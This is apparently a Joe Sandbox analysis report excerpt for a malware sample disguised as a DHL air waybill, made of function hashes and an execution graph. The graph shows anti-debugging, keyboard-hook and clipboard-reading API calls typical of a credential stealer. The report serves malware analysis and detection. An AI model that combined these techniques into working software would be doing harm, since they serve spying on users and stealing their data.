                                            • Opcode Fuzzy Hash: 6cf7bea6e6d407876ac8bb8c7d9dd3e03a07d0c91e0e4fe7f6e08c6fb099b97f
                                            • Instruction Fuzzy Hash: F01282B0CC1745CADB11CF66E95C18E3BA1BB8631CFD04A09E2612E2E5DBB415EACF45
                                            Function 05A2D710 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 216cc7d212b3bf7bc4b0cd288a2c5e17e1b7944ce4e6c2e274ed05401beb2668
                                            • Instruction ID: 7a242e21af0a667fc4f088a239c4753cdafb0926dfaa21094bdc254b8a569077
                                            • Opcode Fuzzy Hash: 216cc7d212b3bf7bc4b0cd288a2c5e17e1b7944ce4e6c2e274ed05401beb2668
                                            • Instruction Fuzzy Hash: 8EE11B74E041198FCB14DFA9C5919AEFBF2FF89304F248169E819AB356D730A942CF61
                                            Function 05A2F628 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3bf97975d73ef5170572d6af59d755cdde794c91910eb8e5d85c4a4628e961d8
                                            • Instruction ID: d77af3a1d4fcbdb6d6bc8a8d7bb10d9b4e4d6f9ff5a8277cd797bd6954421f20
                                            • Opcode Fuzzy Hash: 3bf97975d73ef5170572d6af59d755cdde794c91910eb8e5d85c4a4628e961d8
                                            • Instruction Fuzzy Hash: 01E11B74E041198FCB14DFA9C5819AEFBF2FF89304F248169D819AB356D730A942CFA1
                                            Function 05A2DF80 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9571c791c3b78b133beb2b9c7961ed15a2d821e8cd03d702d8a05deaf63b4f32
                                            • Instruction ID: 6a79bd15fa66773601d403c300885e111461d8b35f8b95cdf4347d2dc97ff92b
                                            • Opcode Fuzzy Hash: 9571c791c3b78b133beb2b9c7961ed15a2d821e8cd03d702d8a05deaf63b4f32
                                            • Instruction Fuzzy Hash: 81E10B74E041298FDB14DF99C5819AEFBF2FF89304F248169D819AB356D730A982CF61
                                            Function 05A2DB48 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9aa3dae4269698a65f25ba6480d1f91ef9dc7764fbb3bc37c23a4086edeeeae1
                                            • Instruction ID: ff125f503d6430374a78a24611ed0892e216b5f2db4376a36e93e45a146d3bc2
                                            • Opcode Fuzzy Hash: 9aa3dae4269698a65f25ba6480d1f91ef9dc7764fbb3bc37c23a4086edeeeae1
                                            • Instruction Fuzzy Hash: D9E11C74E041198FCB14DFA9C5819AEFBF2FF89304F248169D459AB356D730A942CFA1
                                            Function 05A2FA60 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d5993ae20b6ffed9710bb6e7a44976f9baff5f5f4e57daf0a51be080a0d20c61
                                            • Instruction ID: 96588a96e2b5ba2297ae031895f0819a4e240dada99e058af39988e0a9c0f201
                                            • Opcode Fuzzy Hash: d5993ae20b6ffed9710bb6e7a44976f9baff5f5f4e57daf0a51be080a0d20c61
                                            • Instruction Fuzzy Hash: 92E12B74E041298FCB14DFA9C5919AEFBF2FF89304F248169D819AB356D730A942CF61
                                            Function 05A26168 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e38f47fcda0eb474b83a8867e3cce2f3bd3c9fd5c06382b731d07a6576a87f0
                                            • Instruction ID: be4261c95e51f7dc1a210a4d4c4e9bb2b238371316468d512b3dd30597c7ac4d
                                            • Opcode Fuzzy Hash: 4e38f47fcda0eb474b83a8867e3cce2f3bd3c9fd5c06382b731d07a6576a87f0
                                            • Instruction Fuzzy Hash: 9ED11931C2061E8ADB11EF78D990699B7B1FFD5300F209B9AE50977224EF706AC5CB51
                                            Function 02D3D5BC Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55655a4681288adaaf7ee9ec6630ec9fc8e0cd4cf3f361142aaa88cb68c5056c
                                            • Instruction ID: 98d5a11685bdcba579afb5d91b82bef2d3bb8d1866c372c438bf4d767a39864f
                                            • Opcode Fuzzy Hash: 55655a4681288adaaf7ee9ec6630ec9fc8e0cd4cf3f361142aaa88cb68c5056c
                                            • Instruction Fuzzy Hash: 00A15B36E002098FCF0ADFA5D84099EB7B2FF85304B15856AE805AB365DB71ED55CF90
                                            Function 05A26178 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f8eab3ccee004a20ca3a440a7690d9be06c2d2c0d611d008d50eaa0c84b4a150
                                            • Instruction ID: c254d03b489ae6a87e101e445587deb4114238ac614933c851412a812c3c7095
                                            • Opcode Fuzzy Hash: f8eab3ccee004a20ca3a440a7690d9be06c2d2c0d611d008d50eaa0c84b4a150
                                            • Instruction Fuzzy Hash: 43D10831C2061E8ADB11EF78D990A99B7B1FFD5300F209B9AE50977224EF706AC5CB51
                                            Function 053E0006 Relevance: .2, Instructions: 232COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089054014.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_53e0000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dffcb5192901adca770142c51d6783658d450ff8e9bfe061947487aa22400ae8
                                            • Instruction ID: 858daf6ee5960e10a7ab774323adf1b9556975009c035add25b000261291c29b
                                            • Opcode Fuzzy Hash: dffcb5192901adca770142c51d6783658d450ff8e9bfe061947487aa22400ae8
                                            • Instruction Fuzzy Hash: F4C104B0CC0745CADB11CF66E85818E7BB1BB8631CFD54A09E2616F2E1DBB414AACF45
                                            Function 05A26718 Relevance: .1, Instructions: 115COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8424082c211ca8062d23ef4283d02fdb6be48d1737c92702bcd0a6c8595d8b91
                                            • Instruction ID: c3ac0735c891e6d9a7a5667829acf4f0a21b899814b6cbbdf4d90d2a05f52384
                                            • Opcode Fuzzy Hash: 8424082c211ca8062d23ef4283d02fdb6be48d1737c92702bcd0a6c8595d8b91
                                            • Instruction Fuzzy Hash: 5F418235F05129DBCB04CFACD9C2DAEFBB7EF88210B50446AE905EB254DA319D518B91
                                            Function 05A26728 Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dcbc9367e18cfa8e8cf9d4c925d2400174e3a70d137132427b64a526b6d5bb8
                                            • Instruction ID: c42c7fe3fc04faaaf08f15e54f0b53b2cde9315887b455bd5b7bba3456bd24bd
                                            • Opcode Fuzzy Hash: 1dcbc9367e18cfa8e8cf9d4c925d2400174e3a70d137132427b64a526b6d5bb8
                                            • Instruction Fuzzy Hash: 59419235F15129DBCB04CFACE5C2CAEFBB7EF88210B50446AE905EB250DA319D518BC1

                                            Execution Graph

                                            Execution Coverage:11.1%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.5%
                                            Total number of Nodes:195
                                            Total number of Limit Nodes:22
                                            execution_graph 38945 2eed01c 38946 2eed034 38945->38946 38947 2eed08e 38946->38947 38953 6a40ce4 38946->38953 38961 6a40cf8 38946->38961 38965 6a42b83 38946->38965 38969 6a47312 38946->38969 38978 6a42b90 38946->38978 38954 6a40cef 38953->38954 38955 6a473a1 38954->38955 38957 6a47391 38954->38957 38994 6a4632c 38955->38994 38982 6a474c8 38957->38982 38988 6a474b8 38957->38988 38958 6a4739f 38963 6a40d05 38961->38963 38962 6a40cde 38962->38947 38963->38962 39057 6a40bac 38963->39057 38966 6a42b90 38965->38966 38967 6a40ce4 2 API calls 38966->38967 38968 6a42bd7 38967->38968 38968->38947 38970 6a4731a 38969->38970 38971 6a4732a 38969->38971 38970->38947 38972 6a473a1 38971->38972 38975 6a47391 38971->38975 38973 6a4632c 2 API calls 38972->38973 38974 6a4739f 38973->38974 38976 6a474b8 2 API calls 38975->38976 38977 6a474c8 2 API calls 38975->38977 38976->38974 38977->38974 38979 6a42bb6 38978->38979 38980 6a40ce4 2 API calls 38979->38980 38981 6a42bd7 38980->38981 38981->38947 38984 6a474d6 38982->38984 38983 6a4632c 2 API calls 38983->38984 38984->38983 38985 6a475ae 38984->38985 39001 6a47991 38984->39001 39006 6a479a0 38984->39006 38985->38958 38989 6a474c8 38988->38989 38990 6a4632c 2 API calls 38989->38990 38991 6a475ae 38989->38991 38992 6a479a0 OleGetClipboard 38989->38992 38993 6a47991 OleGetClipboard 38989->38993 38990->38989 38991->38958 38992->38989 38993->38989 38995 6a46337 38994->38995 38996 6a476b4 38995->38996 38997 6a4760a 38995->38997 38999 6a40ce4 OleGetClipboard 38996->38999 38998 6a47662 CallWindowProcW 38997->38998 39000 6a47611 38997->39000 38998->39000 38999->39000 39000->38958 39002 6a47996 39001->39002 39003 6a47986 39002->39003 39011 6a47f48 39002->39011 39017 6a47f58 39002->39017 39003->38984 39007 6a479bf 39006->39007 39008 6a479c4 39007->39008 39009 6a47f48 OleGetClipboard 39007->39009 39010 6a47f58 OleGetClipboard 39007->39010 39008->38984 39009->39007 39010->39007 39013 6a47f60 39011->39013 39012 6a47f74 39012->39002 39013->39012 39023 6a47fa0 39013->39023 39034 6a47f92 39013->39034 39014 6a47f89 39014->39002 39019 6a47f60 39017->39019 39018 6a47f74 39018->39002 39019->39018 39021 6a47fa0 OleGetClipboard 39019->39021 39022 6a47f92 OleGetClipboard 39019->39022 39020 6a47f89 39020->39002 39021->39020 39022->39020 39024 6a47fb2 39023->39024 39025 6a47fcd 39024->39025 39027 6a48011 39024->39027 39032 6a47fa0 OleGetClipboard 39025->39032 39033 6a47f92 OleGetClipboard 39025->39033 39026 6a47fd3 39026->39014 39029 6a48091 39027->39029 39045 6a48268 39027->39045 39049 6a48258 39027->39049 39028 6a480af 39028->39014 39029->39014 39032->39026 39033->39026 39035 6a47f9a 39034->39035 39036 6a47fcd 39035->39036 39038 6a48011 39035->39038 39041 6a47fa0 OleGetClipboard 39036->39041 39042 6a47f92 OleGetClipboard 39036->39042 39037 6a47fd3 39037->39014 39040 6a48091 39038->39040 39043 6a48268 OleGetClipboard 39038->39043 39044 6a48258 OleGetClipboard 39038->39044 39039 6a480af 39039->39014 39040->39014 39041->39037 39042->39037 39043->39039 39044->39039 39047 6a4827d 39045->39047 39048 6a482a3 39047->39048 39053 6a47d40 39047->39053 39048->39028 39051 6a4827d 39049->39051 39050 6a47d40 OleGetClipboard 39050->39051 39051->39050 39052 6a482a3 39051->39052 39052->39028 39054 6a48310 OleGetClipboard 39053->39054 39056 6a483aa 39054->39056 39058 6a41930 GetModuleHandleW 39057->39058 39060 6a419a5 39058->39060 39060->38962 38926 6a478c0 38928 6a478c8 38926->38928 38929 6a478eb 38928->38929 38930 6a46384 38928->38930 38931 6a47900 KiUserCallbackDispatcher 38930->38931 38933 6a4796e 38931->38933 38933->38928 39061 6a46730 DuplicateHandle 39062 6a467c6 39061->39062 38934 2f370b8 38935 2f370fc CheckRemoteDebuggerPresent 38934->38935 38936 2f3713e 38935->38936 39063 2f30848 39065 2f3084e 39063->39065 39064 2f3091b 39065->39064 39067 2f31380 39065->39067 39068 2f31383 39067->39068 39069 2f314ae 39068->39069 39073 2f38278 39068->39073 39078 2f3fc80 39068->39078 39082 2f3fc90 39068->39082 39069->39065 39074 2f38282 39073->39074 39075 2f3829c 39074->39075 39086 6a5f688 39074->39086 39090 6a5f67a 39074->39090 39075->39068 39079 2f3fca2 39078->39079 39081 2f3fd19 39079->39081 39095 2f3ec94 39079->39095 39081->39068 39083 2f3fca2 39082->39083 39084 2f3ec94 3 API calls 39083->39084 39085 2f3fd19 39083->39085 39084->39085 39085->39068 39088 6a5f69d 39086->39088 39087 6a5f8b2 39087->39075 39088->39087 39089 6a5fcd0 GlobalMemoryStatusEx GlobalMemoryStatusEx 39088->39089 39089->39088 39092 6a5f5bb 39090->39092 39093 6a5f686 39090->39093 39091 6a5f8b2 39091->39075 39092->39075 39093->39091 39094 6a5fcd0 GlobalMemoryStatusEx GlobalMemoryStatusEx 39093->39094 39094->39093 39096 2f3ec9f 39095->39096 39100 6a40f10 39096->39100 39109 6a40f0e 39096->39109 39097 2f3fef2 39097->39081 39101 6a40f3b 39100->39101 39118 6a41480 39101->39118 39123 6a41471 39101->39123 39102 6a40fbe 39103 6a40fea 39102->39103 39104 6a40bac GetModuleHandleW 39102->39104 39103->39103 39105 6a4102e 39104->39105 39105->39103 39106 6a429cf CreateWindowExW CreateWindowExW 39105->39106 39106->39103 39110 6a40f10 39109->39110 39116 6a41480 GetModuleHandleW 39110->39116 39117 6a41471 GetModuleHandleW 39110->39117 39111 6a40fbe 39112 6a40bac GetModuleHandleW 39111->39112 39114 6a40fea 39111->39114 39113 6a4102e 39112->39113 39113->39114 39144 6a429cf 39113->39144 39116->39111 39117->39111 39120 6a414ad 39118->39120 39119 6a4152e 39120->39119 39128 6a4163d 39120->39128 39136 6a416de 39120->39136 39124 6a414ad 39123->39124 39125 6a4152e 39124->39125 39126 6a4163d GetModuleHandleW 39124->39126 39127 6a416de GetModuleHandleW 39124->39127 39126->39125 39127->39125 39129 6a4167e 39128->39129 39130 6a40bac GetModuleHandleW 39129->39130 39131 6a4177a 39130->39131 39132 6a40bac GetModuleHandleW 39131->39132 39133 6a417f4 39131->39133 39134 6a417c8 39132->39134 39133->39119 39134->39133 39135 6a40bac GetModuleHandleW 39134->39135 39135->39133 39137 6a4172e 39136->39137 39138 6a40bac GetModuleHandleW 39137->39138 39139 6a4177a 39138->39139 39140 6a40bac GetModuleHandleW 39139->39140 39143 6a417f4 39139->39143 39141 6a417c8 39140->39141 39142 6a40bac GetModuleHandleW 39141->39142 39141->39143 39142->39143 39143->39119 39145 6a429d2 CreateWindowExW 39144->39145 39146 6a4299c 39144->39146 39149 6a42afc 39145->39149 39150 6a429cf CreateWindowExW 39146->39150 39152 6a429d8 39146->39152 39148 6a429bd 39148->39114 39150->39148 39153 6a42a40 CreateWindowExW 39152->39153 39155 6a42afc 39153->39155 38937 6a49e08 38939 6a49e4c SetWindowsHookExA 38937->38939 38940 6a49e92 38939->38940 39156 6a48178 39158 6a48183 39156->39158 39157 6a48193 39158->39157 39160 6a464cc 39158->39160 39161 6a481c8 OleInitialize 39160->39161 39162 6a4822c 39161->39162 39162->39157 38941 6a4192b 38942 6a41930 GetModuleHandleW 38941->38942 38944 6a419a5 38942->38944

                                            Executed Functions

                                            Function 06A530A0 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 126 6a530a0-6a530c1 127 6a530c3-6a530c6 126->127 128 6a53867-6a5386a 127->128 129 6a530cc-6a530eb 127->129 130 6a53890-6a53892 128->130 131 6a5386c-6a5388b 128->131 138 6a53104-6a5310e 129->138 139 6a530ed-6a530f0 129->139 133 6a53894 130->133 134 6a53899-6a5389c 130->134 131->130 133->134 134->127 136 6a538a2-6a538ab 134->136 144 6a53114-6a53123 138->144 139->138 141 6a530f2-6a53102 139->141 141->144 252 6a53125 call 6a538c0 144->252 253 6a53125 call 6a538b8 144->253 145 6a5312a-6a5312f 146 6a53131-6a53137 145->146 147 6a5313c-6a53419 145->147 146->136 168 6a5341f-6a534ce 147->168 169 6a53859-6a53866 147->169 178 6a534f7 168->178 179 6a534d0-6a534f5 168->179 181 6a53500-6a53513 178->181 179->181 183 6a53840-6a5384c 181->183 184 6a53519-6a5353b 181->184 183->168 185 6a53852 183->185 184->183 187 6a53541-6a5354b 184->187 185->169 187->183 188 6a53551-6a5355c 187->188 188->183 189 6a53562-6a53638 188->189 201 6a53646-6a53676 189->201 202 6a5363a-6a5363c 189->202 206 6a53684-6a53690 201->206 207 6a53678-6a5367a 201->207 202->201 208 6a536f0-6a536f4 206->208 209 6a53692-6a53696 206->209 207->206 210 6a53831-6a5383a 208->210 211 6a536fa-6a53736 208->211 209->208 212 6a53698-6a536c2 209->212 210->183 210->189 223 6a53744-6a53752 211->223 224 6a53738-6a5373a 211->224 219 6a536c4-6a536c6 212->219 220 6a536d0-6a536ed 212->220 219->220 220->208 226 6a53754-6a5375f 223->226 227 6a53769-6a53774 223->227 224->223 226->227 230 6a53761 226->230 231 6a53776-6a5377c 227->231 232 6a5378c-6a5379d 227->232 230->227 233 6a53780-6a53782 231->233 234 6a5377e 231->234 236 6a537b5-6a537c1 232->236 237 6a5379f-6a537a5 232->237 233->232 234->232 241 6a537c3-6a537c9 236->241 242 6a537d9-6a5382a 236->242 238 6a537a7 237->238 239 6a537a9-6a537ab 237->239 238->236 239->236 243 6a537cd-6a537cf 241->243 244 6a537cb 241->244 242->210 243->242 244->242 252->145 253->145
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-3723351465
                                            • Opcode ID: 35720457b788136bdcea7f0506d909b40e6f79794954ada9789a4b12d1aceb98
                                            • Instruction ID: 56dd2721033c660bc5e83646c2e13bd1bf2ad6c960dceb3f417aeecbd54f42c0
                                            • Opcode Fuzzy Hash: 35720457b788136bdcea7f0506d909b40e6f79794954ada9789a4b12d1aceb98
                                            • Instruction Fuzzy Hash: 94322E31E1061A8FDB15EF75C89459DF7B2FFC9340F2186AAD409AB254EB30A985CB81
                                            Function 06A57DC0 Relevance: 3.0, Strings: 2, Instructions: 473COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 797 6a57dc0-6a57dde 798 6a57de0-6a57de3 797->798 799 6a57de5-6a57def 798->799 800 6a57df0-6a57df3 798->800 801 6a57df5-6a57e0f 800->801 802 6a57e14-6a57e17 800->802 801->802 803 6a57e2e-6a57e31 802->803 804 6a57e19-6a57e27 802->804 805 6a57e54-6a57e56 803->805 806 6a57e33-6a57e4f 803->806 811 6a57e66-6a57e7c 804->811 812 6a57e29 804->812 809 6a57e5d-6a57e60 805->809 810 6a57e58 805->810 806->805 809->798 809->811 810->809 817 6a58097-6a580a1 811->817 818 6a57e82-6a57e8b 811->818 812->803 819 6a57e91-6a57eae 818->819 820 6a580a2-6a580d7 818->820 829 6a58084-6a58091 819->829 830 6a57eb4-6a57edc 819->830 823 6a580d9-6a580dc 820->823 825 6a580ff-6a58102 823->825 826 6a580de-6a580fa 823->826 827 6a581af-6a581b2 825->827 828 6a58108-6a58114 825->828 826->825 831 6a583e7-6a583e9 827->831 832 6a581b8-6a581c7 827->832 834 6a5811f-6a58121 828->834 829->817 829->818 830->829 851 6a57ee2-6a57eeb 830->851 835 6a583f0-6a583f3 831->835 836 6a583eb 831->836 847 6a581e6-6a5822a 832->847 848 6a581c9-6a581e4 832->848 838 6a58123-6a58129 834->838 839 6a58139-6a5813d 834->839 835->823 840 6a583f9-6a58402 835->840 836->835 843 6a5812d-6a5812f 838->843 844 6a5812b 838->844 845 6a5813f-6a58149 839->845 846 6a5814b 839->846 843->839 844->839 850 6a58150-6a58152 845->850 846->850 857 6a58230-6a58241 847->857 858 6a583bb-6a583d1 847->858 848->847 853 6a58154-6a58157 850->853 854 6a58169-6a581a2 850->854 851->820 856 6a57ef1-6a57f0d 851->856 853->840 854->832 877 6a581a4-6a581ae 854->877 863 6a57f13-6a57f3d 856->863 864 6a58072-6a5807e 856->864 867 6a58247-6a58264 857->867 868 6a583a6-6a583b5 857->868 858->831 880 6a57f43-6a57f6b 863->880 881 6a58068-6a5806d 863->881 864->829 864->851 867->868 879 6a5826a-6a58360 call 6a565e0 867->879 868->857 868->858 930 6a58362-6a5836c 879->930 931 6a5836e 879->931 880->881 888 6a57f71-6a57f9f 880->888 881->864 888->881 893 6a57fa5-6a57fae 888->893 893->881 894 6a57fb4-6a57fe6 893->894 902 6a57ff1-6a5800d 894->902 903 6a57fe8-6a57fec 894->903 902->864 905 6a5800f-6a58066 call 6a565e0 902->905 903->881 904 6a57fee 903->904 904->902 905->864 932 6a58373-6a58375 930->932 931->932 932->868 933 6a58377-6a5837c 932->933 934 6a5837e-6a58388 933->934 935 6a5838a 933->935 936 6a5838f-6a58391 934->936 935->936 936->868 937 6a58393-6a5839f 936->937 937->868
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: d2f880118e296b4ad191987f0d066be1585538bb4e2aff98ab009dd08c4efa5d
                                            • Instruction ID: 929513ad05e6f4efabd85f9bfbcc081d2c9aae213e97f800b959a17b2d8fcc0b
                                            • Opcode Fuzzy Hash: d2f880118e296b4ad191987f0d066be1585538bb4e2aff98ab009dd08c4efa5d
                                            • Instruction Fuzzy Hash: F102A130B102169FDB54EF69D4906AEB7E2FF84314F258529D80ADB394DB39DC82CB91
                                            Function 06A551D8 Relevance: 1.9, Strings: 1, Instructions: 603COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1945 6a551d8-6a551f5 1946 6a551f7-6a551fa 1945->1946 1947 6a551fc-6a55205 1946->1947 1948 6a55238-6a5523b 1946->1948 1949 6a553bc-6a553eb 1947->1949 1950 6a5520b-6a55213 1947->1950 1951 6a55251-6a55254 1948->1951 1952 6a5523d-6a5524c 1948->1952 1969 6a553f5-6a553f8 1949->1969 1950->1949 1955 6a55219-6a55229 1950->1955 1953 6a55264-6a55267 1951->1953 1954 6a55256-6a55259 1951->1954 1952->1951 1959 6a5526f-6a55272 1953->1959 1960 6a55269-6a5526a 1953->1960 1957 6a55334-6a5533e 1954->1957 1958 6a5525f 1954->1958 1955->1949 1962 6a5522f-6a55233 1955->1962 1966 6a55345-6a55347 1957->1966 1958->1953 1963 6a55278-6a5527b 1959->1963 1964 6a5531b-6a55324 1959->1964 1960->1959 1962->1948 1967 6a5527d-6a55281 1963->1967 1968 6a5528c-6a5528f 1963->1968 1964->1947 1965 6a5532a 1964->1965 1970 6a5532f-6a55332 1965->1970 1971 6a5534c-6a5534f 1966->1971 1972 6a55287 1967->1972 1973 6a553ae-6a553bb 1967->1973 1976 6a55291-6a5529a 1968->1976 1977 6a5529b-6a5529e 1968->1977 1974 6a5541a-6a5541d 1969->1974 1975 6a553fa-6a553fe 1969->1975 1970->1957 1970->1971 1978 6a55375-6a55378 1971->1978 1979 6a55351-6a55370 1971->1979 1972->1968 1983 6a55427-6a5542a 1974->1983 1984 6a5541f-6a55426 1974->1984 1980 6a55404-6a5540c 1975->1980 1981 6a554ea-6a55524 1975->1981 1977->1954 1982 6a552a0-6a552a3 1977->1982 1987 6a55382-6a55385 1978->1987 1988 6a5537a-6a5537f 1978->1988 1979->1978 1980->1981 1989 6a55412-6a55415 1980->1989 2010 6a55526-6a55529 1981->2010 1990 6a552a5-6a552b2 1982->1990 1991 6a552b7-6a552ba 1982->1991 1985 6a5544c-6a5544f 1983->1985 1986 6a5542c-6a55430 1983->1986 1995 6a55471-6a55474 1985->1995 1996 6a55451-6a55455 1985->1996 1986->1981 1992 6a55436-6a5543e 1986->1992 1999 6a55387-6a5538a 1987->1999 2000 6a5538f-6a55392 1987->2000 1988->1987 1989->1974 1990->1991 1993 6a552d7-6a552da 1991->1993 1994 6a552bc-6a552d2 1991->1994 1992->1981 2004 6a55444-6a55447 1992->2004 2006 6a552f3-6a552f6 1993->2006 2007 6a552dc-6a552ee 1993->2007 1994->1993 2008 6a55476-6a5547a 1995->2008 2009 6a5548e-6a55491 1995->2009 1996->1981 2005 6a5545b-6a55463 1996->2005 1999->2000 2001 6a55394-6a55397 2000->2001 2002 6a5539c-6a5539e 2000->2002 2001->2002 2011 6a553a5-6a553a8 2002->2011 2012 6a553a0 2002->2012 2004->1985 2005->1981 2014 6a55469-6a5546c 2005->2014 2016 6a55300-6a55303 2006->2016 2017 6a552f8-6a552fd 2006->2017 2007->2006 2008->1981 2015 6a5547c-6a55484 2008->2015 2019 6a55493-6a554a4 2009->2019 2020 6a554a9-6a554ac 2009->2020 2021 6a55543-6a55546 2010->2021 2022 6a5552b-6a5553c 2010->2022 2011->1946 2011->1973 2012->2011 2014->1995 2015->1981 2025 6a55486-6a55489 2015->2025 2029 6a55305-6a5530b 2016->2029 2030 6a55316-6a55319 2016->2030 2017->2016 2019->2020 2026 6a554bc-6a554bf 2020->2026 2027 6a554ae-6a554b5 2020->2027 2023 6a55560-6a55563 2021->2023 2024 6a55548-6a55559 2021->2024 2040 6a55580-6a55587 2022->2040 2041 6a5553e 2022->2041 2036 6a55565-6a55578 2023->2036 2037 6a5557b-6a5557e 2023->2037 2024->2040 2047 6a5555b 2024->2047 2025->2009 2034 6a554c1-6a554cb 2026->2034 2035 6a554d0-6a554d2 2026->2035 2032 6a554b7 2027->2032 2033 6a554e2-6a554e9 2027->2033 2029->1960 2038 6a55311 2029->2038 2030->1964 2030->1970 2032->2026 2034->2035 2044 6a554d4 2035->2044 2045 6a554d9-6a554dc 2035->2045 2037->2040 2043 6a5558c-6a5558f 2037->2043 2038->2030 2040->2043 2041->2021 2049 6a55591-6a55594 2043->2049 2050 6a555fb-6a5578f 2043->2050 2044->2045 2045->1969 2045->2033 2047->2023 2051 6a55596-6a555a7 2049->2051 2052 6a555ae-6a555b1 2049->2052 2094 6a558c5-6a558d8 2050->2094 2095 6a55795-6a5579c 2050->2095 2051->2022 2060 6a555a9 2051->2060 2054 6a555b3-6a555b8 2052->2054 2055 6a555bb-6a555be 2052->2055 2054->2055 2057 6a555c0-6a555c7 2055->2057 2058 6a555cc-6a555cf 2055->2058 2057->2058 2058->2050 2061 6a555d1-6a555d4 2058->2061 2060->2052 2062 6a555d6-6a555e7 2061->2062 2063 6a555f2-6a555f5 2061->2063 